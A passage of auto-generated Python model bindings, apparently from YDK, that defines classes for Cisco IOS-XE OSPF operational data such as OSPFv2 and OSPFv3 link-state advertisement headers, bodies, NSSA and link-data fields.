attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv2UnknownTlv(Entity): """ OSPFv2 Unknown TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. 
attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__() self.yang_name = "ospfv2-unknown-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value) class Ospfv3LsaVal(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>` **config**\: False .. 
attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__() self.yang_name = "ospfv3-lsa-val" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? 
**config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. 
attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>` **config**\: False .. 
attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. 
attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = 
"prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. 
attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None 
self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. 
attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None 
self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = 